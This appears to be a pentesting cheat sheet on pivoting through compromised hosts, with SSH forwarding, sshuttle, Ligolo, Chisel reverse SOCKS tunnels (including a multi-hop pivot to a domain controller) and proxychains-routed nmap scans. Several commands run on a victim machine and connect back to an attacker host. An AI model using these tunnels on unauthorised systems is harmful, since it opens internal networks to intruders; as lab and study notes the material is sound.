| Concept | Direction | Example |
|---|---|---|
| Port Forwarding | Local to Remote | ssh -L 8080:localhost:8080 user@remote_server_ip |
| Remote Port Forwarding | Remote to Local | ssh -R 3306:localhost:3306 user@remote_server_ip |
| Reverse Tunnel | Remote to Local | ssh -R 8080:localhost:8080 user@public_server_ip |
| Forward Tunnel | Local to Remote | ssh -L 3306:remote_database_ip:3306 user@remote_server_ip |
Sshuttle
sshuttle -r username@<remote_ip> $CIDR
sudo nmap --top-ports=20 -sT -Pn IP Ligolo
- On attacker machine:
sudo ./proxy -selfcert -laddr $VPN_IP:443 (Use port based on firewall)
- On the machine we have ssh access to
agent_windows.exe -connect <attacker_ip>:<attacker_port> --ignore-cert./agent -connect <attacker_ip>:<attacker_port> --ignore-cert- Once the connection is established we need to setup the tunnel
session
autoroute
-
Now we could scan the network as usual
-
If you already have a sliver session
upload agent.exe
execute agent.exe -connect 192.168.45.195:9001 --ignore-cert
Chisel
After obtaining the reverse shell
Transfer the file to the machine where you obtained the shell based on the version of that OS.
On your machine as Server:
./chisel server -p 8000 --reverseOn the Victim Machine:
./chisel client <attacker_ip>:<attacker_port> R:socksOn attackers Machine:
Modify the file:
sudo nano /etc/proxychains4.conf
socks5 127.0.0.1 1080Then before using any command just write proxychains ahead of it.
proxychains nmap -sT ip- Multi pivot scenarios
On my local machine:
./chisel server -p 8002 --reverse
./chisel server -p 8004 --reverse
On 10.10.10.123:
./chiselj client 10.10.16.108:8002 R:1080:socks
On DC01:
.\chiselj.exe client 10.10.16.108:8004 R:1090:socks
SSH Local Port Forwarding
ssh -N -L [bind_address:]port:host:hostport [username@address]SSH Remote Port Forwarding
In this case, we have access to a non-root shell on a Linux client on the internal network. On this compromised machine, we discover that a MySQL server is running on TCP port 3306. Unlike the previous scenario, the firewall is blocking inbound TCP port 22 (SSH) connections, so we can’t SSH into this server from our Internet-connected Kali machine.
The ssh command syntax to create this tunnel will include the local IP and port, the remote IP and port, and -R to specify a remote forward:
ssh -N -R [bind_address:]port:host:hostport [username@address]SSH Dynamic Port Forwarding
SSH dynamic port forwarding allows us to set a local listening port and have it tunnel incoming traffic to any remote destination through the use of a proxy.
ssh -N -D <address to bind to>:<port to bind to> <username>@<SSH server address>sudo vim /etc/proxychains.confsocks4 127.0.0.1 8080
sudo proxychains nmap --top-ports=20 -sT -Pn 192.168.1.110